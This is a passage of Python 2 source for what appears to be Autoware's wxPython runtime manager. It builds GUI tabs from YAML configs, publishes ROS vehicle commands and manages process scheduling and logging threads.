self.all_cmd_dics.append(self.sensing_cmd)
dic = self.load_yaml('sensing.yaml')
self.add_params(dic.get('params', []))
self.create_checkboxes(dic, self.panel_sensing, None, self.drv_probe_cmd, self.sensing_cmd, self.OnSensingDriver)
self.setup_buttons(dic.get('buttons', {}), self.sensing_cmd)
#self.timer = wx.Timer(self)
#self.Bind(wx.EVT_TIMER, self.OnProbe, self.timer)
#self.probe_interval = 10*1000
#if self.checkbox_auto_probe.GetValue():
# self.OnProbe(None)
# self.timer.Start(self.probe_interval)
self.dlg_rosbag_record = MyDialogRosbagRecord(self, cmd_dic=self.sensing_cmd)
buttons_color_hdr_setup(self.dlg_rosbag_record)
sense_cmds_dic = dic.get('cmds', {})
#
# for Computing tab
#
tab = self.tab_computing
self.all_tabs.append(tab)
parent = self.tree_ctrl_0.GetParent()
for i in range(2):
self.obj_get('tree_ctrl_' + str(i)).Destroy()
items = self.load_yaml('computing.yaml')
self.add_params(items.get('params', []))
self.sys_gdic = items.get('sys_gui')
self.sys_gdic['update_func'] = self.update_func
self.computing_cmd = {}
self.all_cmd_dics.append(self.computing_cmd)
for i in range(2):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.computing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
self.setup_buttons(items.get('buttons', {}), self.computing_cmd)
#
# for Sensing tab (cmds)
#
parent = self.tree_ctrl_sense.GetParent()
self.tree_ctrl_sense.Destroy()
tree_ctrl = self.create_tree(parent, sense_cmds_dic, None, None, self.sensing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_sense = tree_ctrl
#
# for Interface tab
#
tab = self.tab_interface
self.all_tabs.append(tab)
self.interface_cmd = {}
self.all_cmd_dics.append(self.interface_cmd)
self.interface_dic = self.load_yaml('interface.yaml')
self.add_params(self.interface_dic.get('params', []))
self.setup_buttons(self.interface_dic.get('buttons', {}), self.interface_cmd)
self.setup_buttons(self.interface_dic.get('checkboxs', {}), self.interface_cmd)
szr = wx.BoxSizer(wx.VERTICAL)
for cc in self.interface_dic.get('control_check', []):
pdic = {}
prm = self.get_param(cc.get('param'))
for var in prm['vars']:
pdic[ var['name'] ] = var['v']
gdic = self.gdic_get_1st(cc)
panel = ParamPanel(self.panel_interface_cc, frame=self, pdic=pdic, gdic=gdic, prm=prm)
szr.Add(panel, 0, wx.EXPAND)
self.panel_interface_cc.SetSizer(szr)
#
# for Database tab
#
tab = self.tab_database
self.all_tabs.append(tab)
self.data_cmd = {}
self.all_cmd_dics.append(self.data_cmd)
dic = self.load_yaml('data.yaml')
self.add_params(dic.get('params', []))
parent = self.tree_ctrl_data.GetParent()
self.tree_ctrl_data.Destroy()
tree_ctrl = self.create_tree(parent, dic, None, None, self.data_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_data = tree_ctrl
#self.setup_config_param_pdic()
if 'buttons' in dic:
self.setup_buttons(dic['buttons'], self.data_cmd)
#
# for Simulation Tab
#
tab = self.tab_simulation
self.all_tabs.append(tab)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dic = self.load_yaml('simulation.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
btn = self.button_play_rosbag_play
# setup for rosbag info
gdic = self.obj_to_gdic(btn, {})
gdic_v = dic_getset(gdic, 'file', {})
gdic_v['update_hook'] = self.rosbag_info_hook
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc:
self.rosbag_info_hook( tc.GetValue() )
#vp = self.obj_to_varpanel(btn, 'sim_time')
#self.checkbox_sim_time = vp.obj
#try:
# cmd = ['rosparam', 'get', '/use_sim_time']
# if subprocess.check_output(cmd, stderr=open(os.devnull, 'wb')).strip() == 'true':
# self.checkbox_sim_time.SetValue(True)
#except subprocess.CalledProcessError:
# pass
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(tab, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
#
# for Status tab
#
tab = self.tab_status
self.all_tabs.append(tab)
self.status_cmd = {}
self.all_cmd_dics.append(self.status_cmd)
self.status_dic = self.load_yaml('status.yaml')
self.add_params(self.status_dic.get('params', []))
self.setup_buttons(self.status_dic.get('buttons', {}), self.status_cmd)
font = wx.Font(10, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
self.label_top_cmd.SetFont(font)
#
# for Topics tab
#
tab = self.tab_topics
self.all_tabs.append(tab)
#
# for All
#
self.bitmap_logo.Destroy()
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_1.png'), 0.2)
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, bm)
rtmgr.MyFrame.__do_layout(self)
cond = lambda s : s.startswith('tab_')
self.tab_names = [ self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs ]
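		# group alias buttons that share a prefix across the tabs (e.g. the rosbag /
		# rviz / rqt buttons) so alias_sync() can keep their values and enable state in step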
new_btn_grps = ( lambda btn_names, tab_names=self.tab_names :
[ [ self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names ] for bn in btn_names ] )
self.alias_grps = new_btn_grps( ('rosbag', 'rviz', 'rqt') )
self.alias_grps += new_btn_grps( ('android_tablet', 'oculus_rift', 'vehicle_gateway', 'auto_pilot'),
('qs', 'interface') )
for grp in self.alias_grps:
wx.CallAfter(self.alias_sync, get_top(grp))
s = get_tooltip_obj(grp[0])
if s:
for obj in grp[1:]:
set_tooltip_str(obj, s)
# Topics tab (need, after layout for sizer)
self.topics_dic = self.load_yaml('topics.yaml')
self.topics_list = []
self.topics_echo_curr_topic = None
self.topics_echo_proc = None
self.topics_echo_thinf = None
self.topics_echo_que = Queue.Queue()
self.topics_echo_sum = 0
thinf = th_start(self.topics_echo_show_th)
self.all_th_infs.append(thinf)
self.refresh_topics_list()
# waypoint
self.route_cmd_waypoint = [ Waypoint(0,0), Waypoint(0,0) ]
rospy.Subscriber('route_cmd', route_cmd, self.route_cmd_callback)
# topic /xxx_stat
self.stat_dic = {}
for k in [ 'gnss', 'pmap', 'vmap', 'lf' ]:
self.stat_dic[k] = False
name = k + '_stat'
rospy.Subscriber(name, std_msgs.msg.Bool, self.stat_callback, callback_args=k)
# top command thread setup
toprc = os.path.expanduser('~/.toprc')
backup = os.path.expanduser('~/.toprc-autoware-backup')
self.toprc_setup(toprc, backup)
cpu_ibls = [ InfoBarLabel(self, 'CPU'+str(i)) for i in range(psutil.NUM_CPUS) ]
sz = sizer_wrap(cpu_ibls, wx.HORIZONTAL, 1, wx.EXPAND, 0)
self.sizer_cpuinfo.Add(sz, 8, wx.ALL | wx.EXPAND, 4)
self.lb_top5 = []
for i in range(5):
lb = wx.StaticText(self, wx.ID_ANY, '')
change_font_point_by_rate(lb, 0.75)
self.lb_top5.append(lb)
line = wx.StaticLine(self, wx.ID_ANY)
ibl = InfoBarLabel(self, 'Memory', bar_orient=wx.HORIZONTAL)
szr = sizer_wrap(self.lb_top5 + [ line, ibl ], flag=wx.EXPAND | wx.FIXED_MINSIZE)
self.sizer_cpuinfo.Add(szr, 2, wx.ALL | wx.EXPAND, 4)
th_arg = { 'setting':self.status_dic.get('top_cmd_setting', {}),
'cpu_ibls':cpu_ibls, 'mem_ibl':ibl,
'toprc':toprc, 'backup':backup }
thinf = th_start(self.top_cmd_th, th_arg)
self.all_th_infs.append(thinf)
# ps command thread
#thinf = th_start(self.ps_cmd_th, { 'interval':5 })
#self.all_th_infs.append(thinf)
# logout thread
interval = self.status_dic.get('gui_update_interval_ms', 100) * 0.001
tc = self.text_ctrl_stdout
thinf = th_start(self.logout_th, { 'que':self.log_que_stdout, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que_stderr, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
if interval > 0:
thinf = th_start(self.logshow_th, { 'que':self.log_que_show , 'interval':interval , 'tc':tc })
self.all_th_infs.append(thinf)
else:
self.checkbox_stdout.Enable(False)
tc.Enable(False)
# mkdir
paths = [ os.environ['HOME'] + '/.autoware/data/tf',
os.environ['HOME'] + '/.autoware/data/map/pointcloud_map',
os.environ['HOME'] + '/.autoware/data/map/vector_map' ]
for path in paths:
if not os.path.exists(path):
subprocess.call([ 'mkdir', '-p', path ])
# icon
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_2_white.png'), 0.5)
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def __do_layout(self):
pass
def OnClose(self, event):
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic( {'name':name, 'pdic':pdic} ).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
if save_dic != {}:
dir = rtmgr_src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
#print 'save\n', s # for debug
f.write(s)
f.close()
shutdown_proc_manager()
shutdown_sh = self.get_autoware_dir() + '/ros/shutdown'
if os.path.exists(shutdown_sh):
os.system(shutdown_sh)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def RosCb(self, data):
print('recv topic msg : ' + data.data)
r = rospy.Rate(10)
rospy.is_shutdown()
r.sleep()
self.pub.publish(data.data)
r.sleep()
def setup_buttons(self, d, run_dic):
for (k,d2) in d.items():
pfs = [ 'button_', 'checkbox_' ]
obj = next( (self.obj_get(pf+k) for pf in pfs if self.obj_get(pf+k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval( gdic.get(name, {}).get('restore', 'lambda a : None') )
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [ gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars') ]
for pnl in [ gdic.get('panel') ] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def OnGear(self, event):
grp = { self.button_statchk_d : 1,
self.button_statchk_r : 2,
self.button_statchk_b : 3,
self.button_statchk_n : 4 }
self.radio_action(event, grp.keys())
v = grp.get(event.GetEventObject())
if v is not None:
pub = rospy.Publisher('gear_cmd', gear_cmd, queue_size=10)
pub.publish(gear_cmd(gear=v))
def OnLamp(self, event):
pub = rospy.Publisher('lamp_cmd', lamp_cmd, queue_size=10)
msg = lamp_cmd()
msg.l = self.button_statchk_lamp_l.GetValue()
msg.r = self.button_statchk_lamp_r.GetValue()
pub.publish(msg)
def OnIndi(self, event):
pub = rospy.Publisher('indicator_cmd', indicator_cmd, queue_size=10)
msg = indicator_cmd()
msg.l = self.button_statchk_indi_l.GetValue()
msg.r = self.button_statchk_indi_r.GetValue()
pub.publish(msg)
def OnAutoPilot(self, event):
obj = event.GetEventObject()
self.alias_sync(obj)
v = obj.GetValue()
pub = rospy.Publisher('mode_cmd', mode_cmd, queue_size=10)
pub.publish(mode_cmd(mode=v))
def radio_action(self, event, grp):
push = event.GetEventObject()
for b in grp:
v = b.GetValue()
act = None
act = True if b is push and not v else act
act = False if b is not push and v else act
if act is not None:
set_val(b, act)
def stat_label_off(self, obj):
qs_nms = [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]
exec_time = self.qs_dic.get('exec_time', {})
gdic = self.obj_to_gdic(obj, {})
msg = std_msgs.msg.Bool(False)
for k in gdic.get('stat_topic', []):
# exec_time off
if next( (dic for dic in exec_time.values() if k in dic), None):
self.exec_time_callback(std_msgs.msg.Float32(0), (k, 'data'))
else:
self.stat_callback(msg, k)
# Quick Start tab, exec_time off
obj_nm = self.name_get(obj)
nm = next( (nm for nm in qs_nms if 'button_' + nm + '_qs' == obj_nm), None)
for key in exec_time.get(nm, {}):
self.exec_time_callback(std_msgs.msg.Float32(0), (key, 'data'))
def route_cmd_callback(self, data):
self.route_cmd_waypoint = data.point
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud.SetLabel, 'OK' if v else '')
if k in [ 'pmap', 'vmap' ]:
v = self.stat_dic.get('pmap') and self.stat_dic.get('vmap')
wx.CallAfter(self.label_map_qs.SetLabel, 'OK' if v else '')
def exec_time_callback(self, msg, (key, attr)):
msec = int(getattr(msg, attr, 0))
exec_time = self.qs_dic.get('exec_time', {})
(nm, dic) = next( ( (nm, dic) for (nm, dic) in exec_time.items() if key in dic), None)
dic[ key ] = msec
lb = self.obj_get('label_' + nm + '_qs')
if lb:
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
wx.CallAfter(lb.SetLabel, str(sum)+' ms' if sum > 0 else '')
# update Status tab
lb = ''
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
dic = exec_time.get(nm, {})
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
if sum > 0:
s = nm + ' : ' + str(sum) + ' ms'
lb += s + '\n'
wx.CallAfter(self.label_node_time.SetLabel, lb)
wx.CallAfter(self.label_node_time.GetParent().FitInside)
#
# Setup tab
#
def OnSetupLocalizer(self, event):
obj = self.button_setup_tf
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# Computing Tab
#
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def obj_to_add_args(self, obj, msg_box=True):
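		# build the extra command-line arguments for obj from the 'cmd_param' entries of
		# its parameter vars (dash/delim/default, path expansion, 'tail' ordering); when
		# flagged and msg_box is True, a camera-selection or open dialog is shown first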
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'need_camera_info' in gdic.get('flags', []) and msg_box:
ids = self.camera_ids()
if ids:
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
dic_list_push(gdic, 'dialog_type', 'sel_cam')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
else:
pdic['camera_id'] = ''
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join( v.split(unpack) )
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm : prm is sys_prm if sys else prm is not sys_prm
info = next( ( v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param')) ), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None,{})):
sys_prm = self.get_param('sys')
prm_chk = {
True : (lambda prm : prm is sys_prm),
False : (lambda prm : prm is not sys_prm),
None : (lambda prm : True) }.get(sys)
arg_dic_chk = lambda dic: all( [ dic.get(k) == v for (k,v) in arg_dic.items() ] )
return next( ( (cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param')) ), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def name_to_pdic_gdic_prm(self, name, sys=False):
d = self.cfg_dic( {'name':name}, sys=sys )
return ( d.get('pdic'), d.get('gdic'), d.get('param') )
def update_func(self, pdic, gdic, prm):
pdic_empty = (pdic == {})
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and not pdic_empty:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[ name ] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
d = self.cfg_dic( {'pdic':pdic, 'gdic':gdic, 'param':prm}, sys=True )
self.update_proc_cpu(d.get('obj'), d.get('pdic'), d.get('param'))
def update_proc_cpu(self, obj, pdic=None, prm=None):
if obj is None or not obj.GetValue():
return
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc is None:
return
if pdic is None or prm is None:
(pdic, _, prm) = self.obj_to_pdic_gdic_prm(obj, sys=True)
cpu_chks = self.param_value_get(pdic, prm, 'cpu_chks')
cpu_chks = cpu_chks if cpu_chks else [ True for i in range(psutil.NUM_CPUS) ]
cpus = [ i for i in range(psutil.NUM_CPUS) if cpu_chks[i] ]
nice = self.param_value_get(pdic, prm, 'nice', 0)
d = { 'OTHER':SCHED_OTHER, 'FIFO':SCHED_FIFO, 'RR':SCHED_RR }
policy = SCHED_OTHER
priority = 0
if self.param_value_get(pdic, prm, 'real_time', False):
policy = d.get(self.param_value_get(pdic, prm, 'policy', 'FIFO'), SCHED_FIFO)
priority = self.param_value_get(pdic, prm, 'prio', 0)
procs = [ proc ] + proc.get_children(recursive=True)
for proc in procs:
print 'pid={}'.format(proc.pid)
if proc.get_nice() != nice:
print 'nice {} -> {}'.format(proc.get_nice(), nice)
if set_process_nice(proc, nice) is False:
print 'Err set_process_nice()'
if proc.get_cpu_affinity() != cpus:
print 'cpus {} -> {}'.format(proc.get_cpu_affinity(), cpus)
if set_process_cpu_affinity(proc, cpus) is False:
print 'Err set_process_cpu_affinity()'
policy_str = next( (k for (k,v) in d.items() if v == policy), '?')
print 'sched policy={} prio={}'.format(policy_str, priority)
if set_scheduling_policy(proc, policy, priority) is False:
print 'Err scheduling_policy()'
def param_value_get(self, pdic, prm, name, def_ret=None):
def_ret = self.param_default_value_get(prm, name, def_ret)
return pdic.get(name, def_ret) if pdic else def_ret
def param_default_value_get(self, prm, name, def_ret=None):
return next( (var.get('v') for var in prm.get('vars') if var.get('name') == name ), def_ret) \
if prm else def_ret
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval( gdic_v.get('depend_bool', 'lambda v : bool(v)') )
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[ prm['msg'] ]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[ obj.__slots__.index(attr) ]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = { 'True':'true', 'False':'false' }
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = [ 'rosparam', 'list' ]
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = [ 'rosparam', 'get', rosparam ]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = [ 'rosparam', 'set', rosparam, v ] if v != '' else [ 'rosparam', 'delete', rosparam ]
print(cmd)
subprocess.call(cmd)
#
# Sensing Tab
#
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnRosbagRecord(self, event):
self.dlg_rosbag_record.Show()
obj = event.GetEventObject()
set_val(obj, False)
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
if 'name' not in dic:
return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 4)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
if 'param' in dic:
obj = self.add_config_link(dic, panel, obj)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def add_config_link(self, dic, panel, obj):
cfg_obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, '[config]', '')
fix_link_color(cfg_obj)
self.Bind(wx.EVT_HYPERLINK, self.OnConfig, cfg_obj)
add_objs = (obj, wx.StaticText(panel, wx.ID_ANY, ' '), cfg_obj)
hszr = sizer_wrap(add_objs, wx.HORIZONTAL)
name = dic['name']
pdic = self.load_dic_pdic_setup(name, dic)
gdic = self.gdic_get_1st(dic)
prm = self.get_param(dic.get('param'))
self.add_cfg_info(cfg_obj, obj, name, pdic, gdic, True, prm)
return hszr
def camera_ids(self):
if self.button_synchronization.GetValue():
return []
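		# list camera namespaces: keep every '<ns>/image_raw' topic, strip the
		# '/image_raw' suffix, and map a bare 'image_raw' (empty namespace) to '/'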
cmd = "rostopic list | sed -n 's|/image_raw||p' | sed 's/^$/\//'"
return subprocess.check_output(cmd, shell=True).strip().split()
def cam_id_to_obj(self, cam_id, v):
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
if cam_id_obj is None:
cam_id_obj = StrValObj(cam_id, v)
cam_id_obj.SetValue(v)
return cam_id_obj
def camera_id_hook(self, args):
new_id = args.get('pdic', {}).get('camera_id', '')
ids = args.get('ids', [])
if new_id not in ids:
return
idx = ids.index(new_id)
pp = args.get('param_panel')
if pp:
pp.detach_func()
dlg = args.get('dlg')
if dlg:
dlg.EndModal(idx + 100)
def OnCalibrationPublisher(self, event):
obj = event.GetEventObject()
(_, gdic_org, prm) = self.obj_to_pdic_gdic_prm(obj)
if obj.GetValue():
gdic_org['ids'] = self.camera_ids()
ids = gdic_org.get('ids', [])
if ids == []:
self.OnLaunchKill(event)
return
#
# setup
#
(cmd_dic, cmd, _) = self.obj_to_cmd_dic_cmd_proc(obj)
flags = gdic_org.get('flags', [])[:] # copy
if 'open_dialog' in flags:
flags.remove('open_dialog')
pdic_baks = {}
for cam_id in ids:
(pdic_a, gdic_a, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic = pdic_a if pdic_a else self.load_dic_pdic_setup(cam_id, {})
pdic_baks[cam_id] = pdic.copy()
gdic = gdic_a if gdic_a else gdic_org.copy()
gdic['flags'] = flags
cam_id_obj = self.cam_id_to_obj(cam_id, obj.GetValue())
if not pdic_a or not gdic_a:
self.add_cfg_info(cam_id_obj, cam_id_obj, cam_id, pdic, gdic, False, prm)
if not cam_id_obj in cmd_dic:
cmd_dic[ cam_id_obj ] = (cmd, None)
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
#
# Dialog
#
cam_id = ids[0]
while obj.GetValue():
(pdic, gdic, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic['camera_id'] = cam_id
dic_list_push(gdic, 'dialog_type', 'open2')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
gdic_v = dic_getset(gdic, 'camera_id', {})
args = { 'pdic':pdic, 'ids':ids, 'param_panel':gdic.get('param_panel'), 'dlg':dlg }
gdic_v['hook_var'] = { 'hook':self.camera_id_hook, 'args':args }
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
pdic['camera_id'] = cam_id # restore
if dlg_ret == 0: # OK
break
idx = dlg_ret - 100
if idx < 0 or len(ids) <= idx: # Cancel
for cam_id in ids:
(pdic, _, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic.update(pdic_baks.get(cam_id))
set_val(obj, False)
return
# Menu changed
cam_id = ids[idx]
#
# Launch / Kill
#
for cam_id in ids:
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
(pdic, _, _) = self.obj_to_pdic_gdic_prm(cam_id_obj)
pdic['solo_camera'] = False
